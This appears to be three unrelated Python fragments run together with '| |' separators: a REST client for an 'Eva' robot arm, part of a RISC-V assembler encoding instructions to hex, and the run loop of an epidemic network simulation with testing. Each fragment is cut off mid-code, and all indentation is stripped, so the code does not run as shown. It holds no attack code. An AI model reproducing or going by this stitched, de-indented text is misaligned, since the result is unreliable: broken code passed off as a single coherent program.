r = self.__api_request('POST', 'auth', payload=json.dumps({'token': self.api_token}), headers={})
if r.status_code != 200:
eva_error('auth_create_session request error', r)
self.__last_renew = time.time()
self.session_token = r.json()['token']
self.__logger.debug('Created session token {}'.format(self.session_token))
return self.session_token
def auth_invalidate_session(self):
self.__logger.debug('Invalidating session token {}'.format(self.session_token))
r = self.__api_request('DELETE', 'auth')
if r.status_code != 204:
eva_error('auth_invalidate_session request error', r)
self.session_token = None
# DATA
# TODO consider adding type for switch between flat and object modes
def data_snapshot(self, mode='flat'):
r = self.api_call_with_auth('GET', 'data/snapshot?mode=' + mode)
if r.status_code != 200:
eva_error('data_snapshot request error', r)
return r.json()['snapshot']
def data_snapshot_property(self, prop, mode='object'):
snapshot = self.data_snapshot(mode=mode)
if prop in snapshot:
return snapshot[prop]
else:
eva_error('data_snapshot_property request error, property {} not found'.format(prop))
def data_servo_positions(self):
return self.data_snapshot_property('servos.telemetry.position')
# USERS
def users_get(self):
r = self.api_call_with_auth('GET', 'users')
if r.status_code != 200:
eva_error('users_get request error', r)
return r.json()
# CONFIG
def config_update(self, update):
r = self.api_call_with_auth(
'POST', 'config/update', update,
headers={'Content-Type': 'application/x.automata-update'}, timeout=30
)
if r.status_code != 200:
eva_error('config_update error', r)
return r.json()
# GPIO
def gpio_set(self, pin, status):
r = self.__globals_editing(keys='outputs.' + pin, values=status)
if r.status_code != 200:
eva_error('gpio_set error', r)
def gpio_get(self, pin, pin_type):
if (pin not in ['a0', 'a1', 'd0', 'd1', 'd2', 'd3', 'ee_d0', 'ee_d1', 'ee_a0', 'ee_a1']):
eva_error('gpio_get error, no such pin ' + pin)
if (pin_type not in ['input', 'output']):
eva_error('gpio_get error, pin_type must be "input" or "output"')
return self.data_snapshot_property('global.{}s'.format(pin_type))[pin]
# GPIO helper function
def __globals_editing(self, keys, values, mode='flat'):
data = {'changes': []}
if (isinstance(keys, list) and isinstance(values, list)):
[data['changes'].append({'key': c[0], 'value': c[1]}) for c in zip(keys, values)]
else:
data['changes'].append({'key': keys, 'value': values})
data = json.dumps(data)
r = self.api_call_with_auth('POST', 'data/globals?mode=' + mode, data)
return r
# TOOLPATHS
def toolpaths_list(self):
r = self.api_call_with_auth('GET', 'toolpaths')
if r.status_code != 200:
eva_error('toolpaths_list error', r)
return r.json()['toolpaths']
def toolpaths_retrieve(self, ID):
r = self.api_call_with_auth('GET', 'toolpaths/{}'.format(ID))
if r.status_code != 200:
eva_error('toolpaths_retrieve error for ID {}'.format(ID), r)
return r.json()['toolpath']
def toolpaths_save(self, name, toolpathRepr):
toolpaths = self.toolpaths_list()
toolpathId = None
for toolpath in toolpaths:
if toolpath['name'] == name:
toolpathId = toolpath['id']
break
toolpath = json.dumps({'name': name, 'toolpath': toolpathRepr})
if toolpathId is None:
action = 'save'
r = self.api_call_with_auth('POST', 'toolpaths', toolpath)
else:
action = 'update'
r = self.api_call_with_auth('PUT', 'toolpaths/{}'.format(toolpathId), toolpath)
if r.status_code != 200:
eva_error('toolpaths_save {} error'.format(action), r)
else:
if action == 'save':
toolpathId = r.json()['toolpath']['id']
return toolpathId
def toolpaths_use_saved(self, toolpathId):
r = self.api_call_with_auth('POST', 'toolpaths/{}/use'.format(toolpathId))
if r.status_code != 200:
eva_error('toolpaths_use_saved error', r)
def toolpaths_use(self, toolpathRepr):
r = self.api_call_with_auth('POST', 'toolpath/use', json.dumps({'toolpath': toolpathRepr}))
if r.status_code != 200:
eva_error('toolpaths_use error', r)
def toolpaths_delete(self, toolpathId):
r = self.api_call_with_auth('DELETE', 'toolpaths/{}'.format(toolpathId))
if r.status_code != 200:
eva_error('toolpaths_delete error', r)
# LOCK
def lock_status(self):
r = self.api_call_with_auth('GET', 'controls/lock')
if r.status_code != 200:
eva_error('lock_status error', r)
return r.json()
def lock_lock(self):
r = self.api_call_with_auth('POST', 'controls/lock')
if r.status_code != 200:
eva_error('lock_lock error', r)
def lock_renew(self):
r = self.api_call_with_auth('PUT', 'controls/lock')
if r.status_code != 200:
eva_error('lock_renew error', r)
def lock_unlock(self):
r = self.api_call_with_auth('DELETE', 'controls/lock')
if r.status_code != 200:
eva_error('lock_unlock error', r)
def lock_wait_for(self, interval_sec=2, timeout=None):
if self.lock_status()['owner'] == 'you':
return
if timeout is not None:
timeoutT = time.time() + timeout
while True:
try:
self.lock_lock()
return
except Exception as e:
if not isinstance(e, EvaError):
raise e
pass
if timeout is not None:
if timeoutT < time.time():
eva_error('lock_wait_for timeout triggered')
time.sleep(interval_sec)
# CONTROLS/STATE
def control_wait_for(self, goal, interval_sec=1):
"""
control_wait_for will poll Eva's state, waiting for Eva to reach the goal state
"""
parsed_goal = RobotState(goal)
while True:
robot_state = RobotState(self.data_snapshot()['control.state'])
if robot_state == RobotState.ERROR:
eva_error('Eva is in error control state')
elif robot_state == parsed_goal:
return
time.sleep(interval_sec)
def control_wait_for_ready(self):
"""
control_wait_for_ready will poll Eva's state, waiting for Eva to reach "Ready" state
"""
self.control_wait_for(RobotState.READY)
def control_home(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/home')
if r.status_code != 200:
eva_error('control_home error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_run(self, loop=1, wait_for_ready=True, mode='teach'):
r = self.api_call_with_auth('POST', 'controls/run', json.dumps({'mode': mode, 'loop': loop}))
if r.status_code != 200:
eva_error('control_run error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_go_to(self, joints, wait_for_ready=True, velocity=None, duration=None, mode='teach'):
body = {'joints': joints, 'mode': mode}
if velocity is not None:
body['velocity'] = velocity
elif duration is not None:
body['time'] = duration
r = self.api_call_with_auth('POST', 'controls/go_to', json.dumps(body))
if r.status_code != 200:
eva_error('control_go_to error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_pause(self, wait_for_paused=True):
r = self.api_call_with_auth('POST', 'controls/pause')
if r.status_code != 200:
eva_error('control_pause error', r)
elif wait_for_paused:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.PAUSED)
def control_resume(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/resume')
if r.status_code != 200:
eva_error('control_resume error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_cancel(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/cancel')
if r.status_code != 200:
eva_error('control_cancel error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_stop_loop(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/stop_loop')
if r.status_code != 200:
eva_error('control_stop_loop error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_reset_errors(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/reset_errors')
if r.status_code != 204:
eva_error('control_reset_errors error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
# CALCULATIONS
def calc_forward_kinematics(self, joints, fk_type='both', tcp_config=None):
body = {'joints': joints}
if tcp_config is not None:
body['tcp_config'] = tcp_config
r = self.api_call_with_auth('PUT', 'calc/forward_kinematics', json.dumps(body))
if r.status_code != 200:
eva_error('calc_forward_kinematics error', r)
if (fk_type == 'position') or (fk_type == 'orientation'):
return r.json()['fk'][fk_type]
elif (fk_type == 'both'):
return r.json()['fk']
else:
eva_error('calc_forward_kinematics invalid fk_type {}'.format(fk_type), r)
def calc_inverse_kinematics(self, guess, target_position, target_orientation, tcp_config=None):
body = {'guess': guess, | |
= args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 5
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.REM):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 1
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 6
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.REMU):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 1
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 7
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTI):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 19
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTIU):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 3
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 19
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLT):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 0
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTU):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 0
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 3
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.AUIPC):
instructionFields = {}
instructionFields["type"] = "U"
instructionFields["rd"] = args[0]
instructionFields["imm"] = args[1]
instructionFields["opcode"] = 23
subInstructionFields.append(instructionFields)
#Control transfer instructions
elif (instructionEnum == INST.JAL):
instructionFields = {}
instructionFields["type"] = "J"
instructionFields["imm"] = args[0] - programCounter
instructionFields["rd"] = 1
instructionFields["opcode"] = 111
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.J):
instructionFields = {}
instructionFields["type"] = "J"
instructionFields["imm"] = args[0] - programCounter
instructionFields["rd"] = 0
instructionFields["opcode"] = 111
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.JR):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = 0
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["rd"] = 0
instructionFields["opcode"] = 103
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.JALR):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = 0
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["rd"] = args[1]
instructionFields["opcode"] = 103
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BEQ):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BNE):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 1
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BLT):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 4
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BGE):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 5
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BLTU):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 6
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BGEU):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 7
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
#Load and store instructions
elif (instructionEnum == INST.LW):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lw\"")
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LH):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lh\"")
instructionFields["funct3"] = 1
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LHU):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lhu\"")
instructionFields["funct3"] = 5
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LB):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lb\"")
instructionFields["funct3"] = 0
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LBU):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lbu\"")
instructionFields["funct3"] = 4
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SW):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 2
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SH):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 1
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SB):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 0
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LUI):
instructionFields = {}
instructionFields["type"] = "U"
instructionFields["rd"] = args[0]
instructionFields["imm"] = args[1]
instructionFields["opcode"] = 55
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LA):
#Pseudo instruction: la rd, SYMBOL = auipc rd, delta[31:12] + delta[11]; addi rd, rd, delta[11:0]
#Determine delta segments (see page 139 of riscv-spec.pdf)
delta = args[1] - programCounter
delta_31_12 = int(delta/4096)
delta_11 = int((delta-(delta_31_12*4096))/2048)
delta_11_0 = delta%4096
upperValue = delta_31_12 + delta_11
lowerValue = delta_11_0
#Generate intruction field dicts
auipcFields = {}
auipcFields["type"] = "U"
auipcFields["rd"] = args[0]
auipcFields["imm"] = upperValue
auipcFields["opcode"] = 23
subInstructionFields.append(auipcFields)
addiFields = {}
addiFields["type"] = "I"
addiFields["imm"] = lowerValue
addiFields["rs1"] = args[0]
addiFields["funct3"] = 0
addiFields["rd"] = args[0]
addiFields["opcode"] = 19
subInstructionFields.append(addiFields)
#########
# Concatenate instruction fields into binary strings
#########
for instructionFieldDict in subInstructionFields:
binaryString = ""
#R-type instructions
if (instructionFieldDict["type"] == "R"):
funct7_string = format(instructionFieldDict["funct7"], "07b") #7bit value
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}".format(funct7_string, rs2_string, rs1_string, funct3_string, rd_string, opcode_string)
#I-type instructions
elif (instructionFieldDict["type"] == "I"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "012b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "012b")
else:
imm_string = format(instructionFieldDict["imm"], "012b") #12bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}".format(imm_string, rs1_string, funct3_string, rd_string, opcode_string)
#J-type instructions
elif (instructionFieldDict["type"] == "J"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "021b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "021b")
else:
imm_string = format(instructionFieldDict["imm"], "021b") #12bit value
imm_stringReordered = "{}{}{}{}".format(imm_string[-21], imm_string[-11:-1], imm_string[-12], imm_string[-20:-12]) #Rearrange imm_stringOrdered to fit J-type bit index format [20|10:1|11|19:12]
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}".format(imm_stringReordered, rd_string, opcode_string)
#B-type instructions
elif (instructionFieldDict["type"] == "B"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "013b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "013b")
else:
imm_string = format(instructionFieldDict["imm"], "013b") #12bit value
#Split imm_string into required parts for B-type
immString_12 = imm_string[-13]
immString_10_5 = imm_string[-11:-5]
immString_4_1 = imm_string[-5:-1]
immString_11 = imm_string[-12]
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}{}{}".format(immString_12, immString_10_5, rs2_string, rs1_string, funct3_string, immString_4_1, immString_11, opcode_string)
#S-type instructions
elif (instructionFieldDict["type"] == "S"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "013b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "013b")
else:
imm_string = format(instructionFieldDict["imm"], "013b") #12bit value
#Split imm_string into required parts for S-type
immString_11_5 = imm_string[-12:-5]
immString_4_0 = imm_string[-5:]
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}".format(immString_11_5, rs2_string, rs1_string, funct3_string, immString_4_0, opcode_string)
#U-type instructions
elif (instructionFieldDict["type"] == "U"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
raise Exception("Negative immediate used in U type instruction | {}".format(instructionFieldDict["imm"]))
else:
imm_string = format(instructionFieldDict["imm"], "020b") #20bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}".format(imm_string, rd_string, opcode_string)
else:
raise Exception("Unsupported instruction type {}".format(instruction))
#Convert binary instruction string to int and store in list
instructionValues.append(int(binaryString, 2))
#Iterate programCounter
programCounter += 4
except Exception as e:
errorMessage = ""
errorMessage += "PC = {}\n".format(programCounter)
errorMessage += "INST = {}\n\n".format(instruction)
errorMessage += traceback.format_exc()
printColor(errorMessage, color=COLORS.ERROR)
sys.exit()
return instructionValues
def writeLogisimHexFile(integerList, filepath):
'''
Write a list of integers into a Logisim hex file
'''
outputFile = open(filepath, "w")
outputFile.write("v2.0 raw\n")
for val in integerList:
outputFile.write(hex(val)[2:])
outputFile.write("\n")
outputFile.close()
def writeHexFile(integerList, filepath):
'''
Write a list of integers into a hex file
'''
outputFile = open(filepath, "w")
for val in integerList:
hexVal = hex(val)[2:].zfill(8)
outputFile.write(hexVal)
outputFile.write("\n")
outputFile.close()
def generateCsvIndex(instructions, instructionIntValues, filepath):
'''
Will generate a csv index for each instruction
'''
indexDict = {
"ProgramCounter": [],
"instruction": [],
"DEC": [],
"HEX": [],
"BIN": []
}
for address in range(0, len(instructions)):
intructionStr = str(instructions[address])
intValue = instructionIntValues[address]
hexValue = hex(intValue)
binValue = format(intValue, "032b")
indexDict["ProgramCounter"].append(address*4)
indexDict["instruction"].append(intructionStr)
indexDict["DEC"].append(intValue)
indexDict["HEX"].append(hexValue)
indexDict["BIN"].append(binValue)
df = pd.DataFrame(indexDict)
df.to_csv(filepath, index=False)
return df
def main(asmPath, hexPathArg, indexPath, logisim, debuggerAnnotations):
try:
#Convert asm file to machine code
instructions, linedInstructions, initializedData = parseAssemblyFile(asmPath)
programIntValues = instructionsToInts(instructions)
programIntValues.append(0)
programIntValues += [dataDef.value for dataDef in initializedData]
outputPath = asmPath.replace(".asm", "") + ".hex"
if (hexPathArg):
outputPath = hexPathArg
if (logisim):
outputPath = outputPath.replace(".hex", "_logisim.hex")
writeLogisimHexFile(programIntValues, outputPath)
else:
writeHexFile(programIntValues, outputPath)
if (indexPath):
generateCsvIndex(instructions, programIntValues, indexPath)
#Add assembly annotations to debuugerAnnotations dict
debuggerAnnotations["asmFileMap"] = {}
offset = 0 #keep track of offset for multi-inst pseudoinstructions
multiPseudoInstructions = [INST.LA]
for index in range(0, len(linedInstructions)):
#instruction tuple = [<lineNumber>, [<instruction_enum>,<arg1>,<arg2>,...]]
programCounter = (index+offset)*4
debuggerAnnotations["asmFileMap"][programCounter] = {}
debuggerAnnotations["asmFileMap"][programCounter]["lineNum"] = linedInstructions[index][0]
debuggerAnnotations["asmFileMap"][programCounter]["file"] = os.path.abspath(asmPath)
if (linedInstructions[index][1][0] in multiPseudoInstructions):
offset += 1
annotationFile = open("{}_annotation.json".format(asmPath.replace(".asm", "")), "w")
annotationFile.write(utils.dictToJson(debuggerAnnotations))
annotationFile.close()
#Print finished message
printColor("\nDone!", color=COLORS.OKGREEN)
print("{} total instructions".format(len(programIntValues)-1))
addressBits = math.log(len(programIntValues),2)
if (logisim and (addressBits > 24)):
printColor ("WARNING: Program | |
data structures and scenario flags:
self.update_parameters()
# Update the next checkpoint time:
checkpointIdx = numpy.searchsorted(checkpoints['t'],
self.t) # Finds 1st index in list greater than given val
if (checkpointIdx >= numCheckpoints):
# We are out of checkpoints, stop checking them:
checkpoints = None
else:
checkpointTime = checkpoints['t'][checkpointIdx]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# print(f"t={self.t}, period ={self.period}")
if numpy.any(self.p_periodic) \
and (self.period > 0) \
and (int(self.t / self.period) > lastTestInterval):
if verbose:
print(f"periodic testing t={self.t}")
self.periodic_test(self.p_periodic)
lastTestInterval = int(self.t / self.period)
if self.has_policy and (not policyInterval or (int(self.t / policyInterval) > lastPolicyInterval)):
lastPolicyInterval = int(self.t / policyInterval)
if (verbose):
print(f"t={self.t}, Applying policy")
self.policy()
# self.update_parameters()
if self.numD_E[self.tidx] + self.numD_I[self.tidx]:
if not self.time_detected:
self.time_detected = self.tidx
if stopping == "1st":
if self.numD_I[self.tidx] + self.numD_E[self.tidx]:
self.finalize_data_series()
running = False
runTillEnd = False
elif stopping and stopping(self):
self.finalize_data_series()
running = False
runTillEnd = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (print_interval):
if (print_reset and (int(self.t) % print_interval == 0)):
if (verbose == "t"):
print("t = %.2f" % self.t)
if (verbose == True):
print("t = %.2f" % self.t)
print("\t S = " + str(self.numS[self.tidx]))
print("\t E = " + str(self.numE[self.tidx]))
print("\t I = " + str(self.numI[self.tidx]))
print("\t D_E = " + str(self.numD_E[self.tidx]))
print("\t D_I = " + str(self.numD_I[self.tidx]))
print("\t R = " + str(self.numR[self.tidx]))
print("\t F = " + str(self.numF[self.tidx]))
print_reset = False
elif (not print_reset and (int(self.t) % 10 != 0)):
print_reset = True
# end of while loop
if not self.time_detected:
self.time_detected = self.tidx
if (verbose):
print(f"Finished execution at {self.t}")
print(
f"percentage of population tested / day: {100 * numpy.sum(self.numTested) / (self.numNodes * self.t):.3f}%")
totscale = 1
finscale = 1 # 100.0/(self.numNodes)
log = {}
for k, v in self.init_parameters.items():
if isinstance(v, dict):
for a, b in v.items():
log[f"{k}_{a}"] = b
else:
if isinstance(v, (list, numpy.ndarray)):
v = "list/array"
log[k] = v
temp = numpy.roll(self.tseries, 1)
temp[0] = 0
lengths = self.tseries - temp
log.update(
{"type": type,
"variant": variant,
"checkpoints": checkpoints,
"policy": self.has_policy,
"policy interval": policyInterval,
"stopping": stopping,
"t": self.t,
"totS": numpy.sum(self.numS * lengths),
"totE": numpy.sum(self.numE * lengths),
"totI": numpy.sum(self.numI * lengths),
"totD_E": numpy.sum(self.numD_E * lengths),
"totD_I": numpy.sum(self.numD_I * lengths),
"totE_tillFirst": numpy.sum(self.numE[:self.time_detected + 1] * lengths[:self.time_detected + 1]),
"totI_tillFirst": numpy.sum(self.numI[:self.time_detected + 1] * lengths[:self.time_detected + 1]),
"totR": numpy.sum(self.numR * lengths),
"tit": numpy.sum(self.numF * lengths),
"totTests": numpy.sum(self.numTested),
"totTests1st": numpy.sum(self.numTested[:self.time_detected + 1]),
"meanTests1st": numpy.sum(self.numTested[:self.time_detected + 1]) / self.tseries[
self.time_detected] if self.time_detected else 0,
"totPositive": numpy.sum(self.numPositive),
"finS": self.numS[self.tidx] * finscale,
"finE": self.numE[self.tidx] * finscale,
"finI": self.numI[self.tidx] * finscale,
"finD_E": self.numD_E[self.tidx] * finscale,
"finD_I": self.numD_I[self.tidx] * finscale,
"finR": self.numR[self.tidx] * finscale,
"finF": self.numF[self.tidx] * finscale,
"note": f"Finals scaled by {finscale:.5f}. Averages per time period",
"time1st": self.tseries[self.time_detected]
})
if (self.nodeGroupData):
for groupName in self.nodeGroupData:
log.update({
f"{groupName}_totS": numpy.sum(self.nodeGroupData[groupName]['numS'] * lengths),
f"{groupName}_totE": numpy.sum(self.nodeGroupData[groupName]['numE'] * lengths),
f"{groupName}_totI": numpy.sum(self.nodeGroupData[groupName]['numI'] * lengths),
f"{groupName}_totD_E": numpy.sum(self.nodeGroupData[groupName]['numD_E'] * lengths),
f"{groupName}_totD_I": numpy.sum(self.nodeGroupData[groupName]['numD_I'] * lengths),
f"{groupName}_totE_tillFirst": numpy.sum(
self.nodeGroupData[groupName]['numE'][:self.time_detected + 1] * lengths[
:self.time_detected + 1]),
f"{groupName}_totI_tillFirst": numpy.sum(
self.nodeGroupData[groupName]['numI'][:self.time_detected + 1] * lengths[
:self.time_detected + 1]),
f"{groupName}_totR": numpy.sum(self.nodeGroupData[groupName]['numR'] * lengths),
f"{groupName}_totTests": numpy.sum(self.nodeGroupData[groupName]['numTested']),
f"{groupName}_totTests1st": numpy.sum(
